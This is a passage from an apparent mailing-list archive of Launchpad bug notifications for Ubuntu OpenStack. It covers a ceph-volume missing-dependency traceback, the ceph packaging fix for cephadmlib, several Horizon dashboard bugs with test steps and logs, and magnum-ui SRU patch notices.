https://openstack-ci-reports.ubuntu.com/artifacts/dcf/917920/4/check/jammy-caracal/dcf9973/index.html Traceback excerpt: 2024-05-02 19:31:54.624912 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 INFO unit.ceph-osd/0.juju-log server.go:316 mon:27: osdize cmd: ['ceph-volume', 'lvm', 'create', '--osd-fsid', 'aef29aff-df24-4bb8-bfb3-bcd607761b2e', '--bluestore', '--data', 'ceph-aef29aff-df24-4bb8-bfb3-bcd607761b2e/osd-block-aef29aff-df24-4bb8-bfb3-bcd607761b2e'] 2024-05-02 19:31:54.624972 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 Traceback (most recent call last): 2024-05-02 19:31:54.624990 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/sbin/ceph-volume", line 33, in 2024-05-02 19:31:54.625002 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 sys.exit(load_entry_point('ceph-volume==1.0.0', 'console_scripts', 'ceph-volume')()) 2024-05-02 19:31:54.625014 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/sbin/ceph-volume", line 25, in importlib_load_entry_point 2024-05-02 19:31:54.625189 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 return next(matches).load() 2024-05-02 19:31:54.625210 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 171, in load 2024-05-02 19:31:54.625222 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 module = import_module(match.group('module')) 2024-05-02 19:31:54.625234 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module 2024-05-02 19:31:54.625247 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 return _bootstrap._gcd_import(name[level:], package, level) 2024-05-02 19:31:54.625259 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1050, in _gcd_import 2024-05-02 19:31:54.625541 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1027, in _find_and_load 2024-05-02 19:31:54.625598 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1006, in _find_and_load_unlocked 2024-05-02 19:31:54.625611 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 688, in _load_unlocked 2024-05-02 19:31:54.625622 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 883, in exec_module 2024-05-02 19:31:54.625633 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 241, in _call_with_frames_removed 2024-05-02 19:31:54.625975 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/main.py", line 9, in 2024-05-02 19:31:54.626007 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from ceph_volume import log, devices, configuration, conf, exceptions, terminal, inventory, drive_group, activate 2024-05-02 19:31:54.626057 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/__init__.py", line 1, in 2024-05-02 19:31:54.626072 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from . import lvm, simple, raw # noqa 2024-05-02 19:31:54.626280 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/__init__.py", line 1, in 2024-05-02 19:31:54.626313 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from .main import LVM # noqa 2024-05-02 19:31:54.626327 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/main.py", line 4, in 2024-05-02 19:31:54.626339 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from . import activate 2024-05-02 19:31:54.626359 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/activate.py", line 9, in 2024-05-02 19:31:54.626371 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from ceph_volume.util import encryption as encryption_utils 2024-05-02 19:31:54.626465 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/util/encryption.py", line 9, in 2024-05-02 19:31:54.626490 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from packaging import version 2024-05-02 19:31:54.626502 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 ModuleNotFoundError: No module named 'packaging' To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ceph-osd/+bug/2064717/+subscriptions From 2063456 at bugs.launchpad.net Thu Aug 1 14:06:28 2024 From: 2063456 at bugs.launchpad.net (Launchpad Bug Tracker) Date: Thu, 01 Aug 2024 14:06:28 -0000 Subject: [Bug 2063456] Re: package cephadm: dependency "cephadmlib" missing References: <171405346965.2999622.7629650603626855594.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172252119280.2776201.11436544088405820700.malone@scripts.lp.internal> This bug was fixed in the package ceph - 19.2.0~git20240301.4c76c50-0ubuntu6.1 --------------- ceph (19.2.0~git20240301.4c76c50-0ubuntu6.1) noble; urgency=medium [ Luciano Lo Giudice] * d/control: Add python3-{packaging,ceph-common} to (Build-)Depends as these are undocumented/detected runtime dependencies in ceph-volume (LP: #2064717). [ James Page ] * d/cephadm.install: Install cephadmlib Python module which the cephadm script uses (LP: #2063456). * d/control: Update Vcs-* to point to Launchpad for Ubuntu packaging. * d/p/mgr-distutils.patch: Directly use vendored distutils from setuptools for Python that runs in the mgr daemon (LP: #2065867). -- James Page Sat, 18 May 2024 12:40:36 +0200 ** Changed in: ceph (Ubuntu Noble) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2063456 Title: package cephadm: dependency "cephadmlib" missing Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] cephadm tool is not usable due to files missing from the package. [ Test Plan ] sudo apt install cephadm cephadm bootstrap --mon-ip 10.23.127.2 [ Where problems could occur ] While fixing the minor packaging issue that causes this problem it was also noticed that the package is architecture any rather than all (and its pure python) so the packaging update includes this as well. [ Original Bug Report ] After installing cephadm at least on arm64 cephadmlib is missing. Traceback (most recent call last):   File "/usr/sbin/cephadm", line 33, in     from cephadmlib.constants import ( ModuleNotFoundError: No module named 'cephadmlib' Steps to reproduce (on ARM64) root at ceph-node1:~# apt install -y cephadm Reading package lists... Done Building dependency tree... Done Reading state information... Done The following additional packages will be installed:   bridge-utils containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan Suggested packages:   ifupdown aufs-tools cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2   docker-doc rinse zfs-fuse | zfsutils The following NEW packages will be installed:   bridge-utils cephadm containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan 0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded. root at ceph-node1:~# cephadm bootstrap --mon-ip 10.23.127.2 Traceback (most recent call last):   File "/usr/sbin/cephadm", line 33, in     from cephadmlib.constants import ( ModuleNotFoundError: No module named 'cephadmlib' ProblemType: Bug DistroRelease: Ubuntu 24.04 Package: cephadm 19.2.0~git20240301.4c76c50-0ubuntu6 ProcVersionSignature: Ubuntu 6.8.0-31.31-generic 6.8.1 Uname: Linux 6.8.0-31-generic aarch64 ApportVersion: 2.28.1-0ubuntu2 Architecture: arm64 CasperMD5CheckResult: pass Date: Thu Apr 25 13:49:50 2024 InstallationDate: Installed on 2024-04-25 (0 days ago) InstallationMedia: Ubuntu-Server 24.04 LTS "Noble Numbat" - Release arm64 (20240423) ProcEnviron:  LANG=en_US.UTF-8  LC_CTYPE=C.UTF-8  PATH=(custom, no user)  SHELL=/bin/bash  TERM=xterm-256color SourcePackage: ceph UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2063456/+subscriptions From 2063456 at bugs.launchpad.net Thu Aug 1 14:06:47 2024 From: 2063456 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 14:06:47 -0000 Subject: [Bug 2063456] Update Released References: <171405346965.2999622.7629650603626855594.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172252120800.774372.4314959163752344501.malone@juju-98d295-prod-launchpad-7> The verification of the Stable Release Update for ceph has completed successfully and the package is now being released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2063456 Title: package cephadm: dependency "cephadmlib" missing Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] cephadm tool is not usable due to files missing from the package. [ Test Plan ] sudo apt install cephadm cephadm bootstrap --mon-ip 10.23.127.2 [ Where problems could occur ] While fixing the minor packaging issue that causes this problem it was also noticed that the package is architecture any rather than all (and its pure python) so the packaging update includes this as well. [ Original Bug Report ] After installing cephadm at least on arm64 cephadmlib is missing. Traceback (most recent call last):   File "/usr/sbin/cephadm", line 33, in     from cephadmlib.constants import ( ModuleNotFoundError: No module named 'cephadmlib' Steps to reproduce (on ARM64) root at ceph-node1:~# apt install -y cephadm Reading package lists... Done Building dependency tree... Done Reading state information... Done The following additional packages will be installed:   bridge-utils containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan Suggested packages:   ifupdown aufs-tools cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2   docker-doc rinse zfs-fuse | zfsutils The following NEW packages will be installed:   bridge-utils cephadm containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan 0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded. root at ceph-node1:~# cephadm bootstrap --mon-ip 10.23.127.2 Traceback (most recent call last):   File "/usr/sbin/cephadm", line 33, in     from cephadmlib.constants import ( ModuleNotFoundError: No module named 'cephadmlib' ProblemType: Bug DistroRelease: Ubuntu 24.04 Package: cephadm 19.2.0~git20240301.4c76c50-0ubuntu6 ProcVersionSignature: Ubuntu 6.8.0-31.31-generic 6.8.1 Uname: Linux 6.8.0-31-generic aarch64 ApportVersion: 2.28.1-0ubuntu2 Architecture: arm64 CasperMD5CheckResult: pass Date: Thu Apr 25 13:49:50 2024 InstallationDate: Installed on 2024-04-25 (0 days ago) InstallationMedia: Ubuntu-Server 24.04 LTS "Noble Numbat" - Release arm64 (20240423) ProcEnviron:  LANG=en_US.UTF-8  LC_CTYPE=C.UTF-8  PATH=(custom, no user)  SHELL=/bin/bash  TERM=xterm-256color SourcePackage: ceph UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2063456/+subscriptions From 2054799 at bugs.launchpad.net Thu Aug 1 14:56:31 2024 From: 2054799 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 14:56:31 -0000 Subject: [Bug 2054799] Fix included in openstack/horizon 23.1.1 References: <170868334749.696109.18152739056199258442.malonedeb@juju-98d295-prod-launchpad-7> Message-ID: <172252419122.402566.3900115495324588818.malone@juju-98d295-prod-launchpad-2> This issue was fixed in the openstack/horizon 23.1.1 release. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to horizon in Ubuntu. https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. [Others] Original Bug Description Below =========== We are not able to see the list of users assigned to a project in Horizon. Scenario: - Log in as Cloud Admin - Set Domain Context (k8s) - Go to projects section - Click on project Permissions_Roles_Test - Go to Users Expectation: Get a table with the users assigned to this project. Result: Get an error - https://i.imgur.com/TminwUy.png [attached] [Test steps] 1, Create an ordinary openstack test env with horizon. 2, Prepared some test data (eg: one domain k8s, one project k8s, and one user k8s-admain with the role k8s-admin-role) openstack domain create k8s openstack role create k8s-admin-role openstack project create --domain k8s k8s openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role $ openstack role assignment list --project k8s --names +----------------+---------------+-------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +----------------+---------------+-------+---------+--------+--------+-----------+ | k8s-admin-role | k8s-admin at k8s | | k8s at k8s | | | False | +----------------+---------------+-------+---------+--------+--------+-----------+ 3, Log in horizon dashboard with admin user(eg: admin/openstack/admin_domain). 4, Click 'Identity -> Domains' to set domain context to the domain 'k8s'. 5, Click 'Identity -> Project -> k8s project -> Users'. 6, This is the result, it said 'Unable to disaply the users of this project' - https://i.imgur.com/TminwUy.png 7, These are some logs ==> /var/log/apache2/error.log <== [Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11' ==> /var/log/apache2/ssl_access.log <== 10.5.3.120 - - [23/Feb/2024:10:03:11 +0000] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" [Some Analyses] This action will call this function in horizon [1]. This function will firstly get a list of users (api.keystone.user_list) [2], then role assignment list (api.keystone.get_project_users_roles) [3]. Without setting domain context, this works fine. However, if setting domain context, the project displayed is in a different domain. The user list from [2] only contains users of the user's own domain, while the role assignment list [3] includes users in another domain since the project is in another domain. From horizon's debug log, here is an example of user list: {"users": [{"email": "juju at localhost", "id": "8cd8f92ac2f94149a91488ad66f02382", "name": "admin", "domain_id": "103a4eb1712f4eb9873240d5a7f66599", "enabled": true, "password_expires_at": null, "options": {}, "links": {"self": "https://192.168.1.59:5000/v3/users/8cd8f92ac2f94149a91488ad66f02382"}}], "links": {"next": null, "self": "https://192.168.1.59:5000/v3/users", "previous": null}} Here is an example of role assignment list: {"role_assignments": [{"links": {"assignment": "https://192.168.1.59:5000/v3/projects/82e250e8492b49a1a05467994d33ea1b/users/a70745ed9ac047ad88b917f24df3c873/roles/f606fafcb4fd47018aeffec2b07b7e84"}, "scope": {"project": {"id": "82e250e8492b49a1a05467994d33ea1b"}}, "user": {"id": "a70745ed9ac047ad88b917f24df3c873"}, "role": {"id": "f606fafcb4fd47018aeffec2b07b7e84"}}, {"links": {"assignment": "https://192.168.1.59:5000/v3/projects/82e250e8492b49a1a05467994d33ea1b/users/fd7a79e2a4044c17873c08daa9ed37a1/roles/b936a9d998be4500900a5a9174b16b42"}, "scope": {"project": {"id": "82e250e8492b49a1a05467994d33ea1b"}}, "user": {"id": "fd7a79e2a4044c17873c08daa9ed37a1"}, "role": {"id": "b936a9d998be4500900a5a9174b16b42"}}], "links": {"next": null, "self": "https://192.168.1.59:5000/v3/role_assignments?scope.project.id=82e250e8492b49a1a05467994d33ea1b&include_subtree=True", "previous": null}} Then later in the horizon function, it tries to get user details from user list for users in role assignment list [4], and fails, because users in role assignment list don't exist in user list. Horizon throws an error like: [Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11' This id is the id of a user, which is used as a key to find a user in the user list. But user list doesn't have this id, so it fails. [1] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L85 [2] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L96 [3] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L100 [4] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L108 To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2054799/+subscriptions From 1993005 at bugs.launchpad.net Thu Aug 1 14:57:17 2024 From: 1993005 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 14:57:17 -0000 Subject: [Bug 1993005] Fix included in openstack/horizon 23.1.1 References: <166577916945.35938.15912952479644408967.malonedeb@daniels.canonical.com> Message-ID: <172252423738.1691982.17632401013503698677.malone@juju-98d295-prod-launchpad-4> This issue was fixed in the openstack/horizon 23.1.1 release. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to horizon in Ubuntu. https://bugs.launchpad.net/bugs/1993005 Title: Swift file upload fails on zed with "This name already exists." for non-existing files Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Bug description: Swift file upload fails on zed with "This name already exists." for non-existing files. Please see attached screenshot for the behavior. I've narrowed this down to a change in 'function getObjectDetails' in swift.service.js. The 'Migrate to AngularJS v1.8.2' change in commit f044c4b0a3 updated the file with: @@ -297,9 +297,9 @@        );        if (ignoreError) {          // provide a noop error handler so the error is ignored - return promise.error(angular.noop); + return promise.catch(angular.noop);        } - return promise.error(function () { + return promise.catch(function onError() {          toastService.add('error', gettext('Unable to get details of the object.'));        });      } If I revert these 2 lines of code, I'm able to upload a file again without the error, however I'm also able to upload it twice and overwrite the existing file the 2nd time. Update: Specifically reverting the first LOC to the following seems to fix this: return promise.error(angular.noop); To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1993005/+subscriptions From 1728031 at bugs.launchpad.net Thu Aug 1 14:56:39 2024 From: 1728031 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 14:56:39 -0000 Subject: [Bug 1728031] Fix included in openstack/horizon 23.1.1 References: <150910584425.20448.7125062752134236004.malonedeb@soybean.canonical.com> Message-ID: <172252419955.988949.350944872804466661.malone@juju-98d295-prod-launchpad-3> This issue was fixed in the openstack/horizon 23.1.1 release. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to horizon in Ubuntu. https://bugs.launchpad.net/bugs/1728031 Title: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: After following the security hardening guidelines: https://docs.openstack.org/security-guide/dashboard/checklist.html#check-dashboard-09-is-enforce-password-check-set-to-true After this check is enabled Check-Dashboard-09: Is ENFORCE_PASSWORD_CHECK set to True The user password cannot be changed. The form submission fails by displaying that admin password is incorrect. The reason for this is in keystone.py in openstack_dashboard/api/keystone.py user_verify_admin_password method uses internal url to communicate with the keystone. line 500: endpoint = _get_endpoint_url(request, 'internalURL') This should be changed to adminURL =============== SRU Description =============== [Impact] Admins cannot change user's password as it gives an error saying that the admin's password is incorrect, despite being correct. There are 2 causes: 1) due to the lack of user_domain being specified when validating the admin's password, it will always fail if the admin is not registered in the "default" domain, because the user_domain defaults to "default" when not specified. 2) even if the admin user is registered in the "default" domain, it may fail due to the wrong endpoint being used in the request to validate the admin's password. The issues are fixed in 2 separate patches [1] and [2]. However, [2] is introducing a new config option, while [1] alone is also enough to fix the occurrence on some deployments. We are including only [1] in the SRU. [Test Plan] Part 1/2) Test case 1. Setting up the env, ensure ENFORCE_PASSWORD_CHECK is set to True 1a. Deploy openstack env with horizon/openstack-dashboard 1b. Set up admin user in a domain not named "default", such as "admin_domain". 1c. Set up any other user, such as demo. Preferably in the admin_domain as well for convenience. 2. Reproduce the bug 2a. Login as admin and navigate to Identity > Users 2b. On the far right-hand side of the demo user row, click the options button and select Change Password 2c. Type in any new password, repeat it below, and type in the admin password. Click Save and you should see a message "The admin password is incorrect" 3. Install package that contains the fixed code 4. Confirm fix 5a. Repeat steps 2a-2c 5b. The password should now be saved successfully Part 2/2) Expected failures Check that password changes will continue to fail in scenarios where it is expected to fail, such as: - admin password incorrect - user not authorized cases (comment #35) [Where problems could occur] The code is a 1-line change that was tested in upstream CI (without the addition of bug-specific functional tests) from master(Caracal) to stable/zed without any issue captured. No side effects or risks are foreseen. Usage of fix [1] has also been tested manually without fix [2] and still worked. Worst case scenario, the ability to change password that currently does not work will still not work, because the code change is isolated to the specific function that validates the authenticity of the password used. Regressions would likely manifest when trying to change user passwords. [Other Info] None. [1] https://review.opendev.org/c/openstack/horizon/+/913250 [2] https://review.opendev.org/c/openstack/horizon/+/844574 To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1728031/+subscriptions From 2038663 at bugs.launchpad.net Thu Aug 1 15:33:51 2024 From: 2038663 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:33:51 -0000 Subject: [Bug 2038663] Re: no option to override the fixed_subnet when creating a new cluster References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252643127.910691.18422035581027542947.malone@juju-98d295-prod-launchpad-7> ** Patch added: "lp2038663_antelope.debdiff" https://bugs.launchpad.net/ubuntu/+source/magnum-ui/+bug/2038663/+attachment/5801997/+files/lp2038663_antelope.debdiff -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038663 Title: [SRU] no option to override the fixed_subnet when creating a new cluster Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum UI: Fix Released Status in magnum-ui package in Ubuntu: Invalid Status in magnum-ui source package in Focal: New Status in magnum-ui source package in Jammy: New Bug description: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2038663 at bugs.launchpad.net Thu Aug 1 15:34:20 2024 From: 2038663 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:34:20 -0000 Subject: [Bug 2038663] Re: no option to override the fixed_subnet when creating a new cluster References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252646026.1042323.315991034390987820.malone@juju-98d295-prod-launchpad-3> ** Patch added: "lp2038663_jammy.debdiff" https://bugs.launchpad.net/ubuntu/+source/magnum-ui/+bug/2038663/+attachment/5801998/+files/lp2038663_jammy.debdiff -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038663 Title: [SRU] no option to override the fixed_subnet when creating a new cluster Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum UI: Fix Released Status in magnum-ui package in Ubuntu: Invalid Status in magnum-ui source package in Focal: New Status in magnum-ui source package in Jammy: New Bug description: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2038663 at bugs.launchpad.net Thu Aug 1 15:34:50 2024 From: 2038663 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:34:50 -0000 Subject: [Bug 2038663] Re: no option to override the fixed_subnet when creating a new cluster References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252649012.911541.631450373276875464.malone@juju-98d295-prod-launchpad-7> ** Patch added: "lp2038663_focal.debdiff" https://bugs.launchpad.net/ubuntu/+source/magnum-ui/+bug/2038663/+attachment/5801999/+files/lp2038663_focal.debdiff ** Summary changed: - no option to override the fixed_subnet when creating a new cluster + [SRU] no option to override the fixed_subnet when creating a new cluster -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038663 Title: [SRU] no option to override the fixed_subnet when creating a new cluster Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive 